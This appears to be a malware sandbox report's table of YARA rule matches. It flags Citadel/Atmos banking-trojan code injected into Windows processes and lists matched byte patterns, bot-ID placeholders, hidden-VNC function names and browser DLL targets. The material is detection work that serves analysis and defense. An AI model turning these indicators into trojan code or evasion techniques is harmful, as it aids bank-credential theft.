4.3.svchost.exe.9a0000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 9A 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 9A 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 9A 00
4.3.svchost.exe.9a0000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
23.3.UserOOBEBroker.exe.10000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
23.3.UserOOBEBroker.exe.10000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
23.3.UserOOBEBroker.exe.10000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
23.3.UserOOBEBroker.exe.10000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 01 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 01 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 01 00
23.3.UserOOBEBroker.exe.10000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
7.0.svchost.exe.d40000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
7.0.svchost.exe.d40000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
7.0.svchost.exe.d40000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
7.0.svchost.exe.d40000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 D4 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 D4 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 D4 00
7.0.svchost.exe.d40000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
6.0.explorer.exe.c350000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
6.0.explorer.exe.c350000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
6.0.explorer.exe.c350000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
6.0.explorer.exe.c350000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
40.2.XRdxSzSUL8yOL.exe.2390000.1.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
40.2.XRdxSzSUL8yOL.exe.2390000.1.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
40.2.XRdxSzSUL8yOL.exe.2390000.1.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
40.2.XRdxSzSUL8yOL.exe.2390000.1.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
29.3.RuntimeBroker.exe.ee0000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
29.3.RuntimeBroker.exe.ee0000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
29.3.RuntimeBroker.exe.ee0000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
29.3.RuntimeBroker.exe.ee0000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 EE 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 EE 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 EE 00
29.3.RuntimeBroker.exe.ee0000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
26.3.conhost.exe.30000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
26.3.conhost.exe.30000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
26.3.conhost.exe.30000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
26.3.conhost.exe.30000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 03 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 03 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 03 00
26.3.conhost.exe.30000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
40.2.XRdxSzSUL8yOL.exe.2390000.1.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
40.2.XRdxSzSUL8yOL.exe.2390000.1.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
40.2.XRdxSzSUL8yOL.exe.2390000.1.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
40.2.XRdxSzSUL8yOL.exe.2390000.1.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
20.3.WinStore.App.exe.a10000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
20.3.WinStore.App.exe.a10000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
20.3.WinStore.App.exe.a10000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
20.3.WinStore.App.exe.a10000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 A1 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 A1 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 A1 00
20.3.WinStore.App.exe.a10000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
39.2.XRdxSzSUL8yOL.exe.2b30000.1.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
39.2.XRdxSzSUL8yOL.exe.2b30000.1.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
39.2.XRdxSzSUL8yOL.exe.2b30000.1.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
39.2.XRdxSzSUL8yOL.exe.2b30000.1.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
7.3.svchost.exe.d40000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
7.3.svchost.exe.d40000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
7.3.svchost.exe.d40000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
7.3.svchost.exe.d40000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 D4 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 D4 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 D4 00
7.3.svchost.exe.d40000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
33.2.XRdxSzSUL8yOL.exe.2e50000.1.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
33.2.XRdxSzSUL8yOL.exe.2e50000.1.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
33.2.XRdxSzSUL8yOL.exe.2e50000.1.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
33.2.XRdxSzSUL8yOL.exe.2e50000.1.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
4.3.svchost.exe.9a0000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
4.3.svchost.exe.9a0000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
4.3.svchost.exe.9a0000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
4.3.svchost.exe.9a0000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 9A 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 9A 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 9A 00
4.3.svchost.exe.9a0000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
19.3.ApplicationFrameHost.exe.180000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
19.3.ApplicationFrameHost.exe.180000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
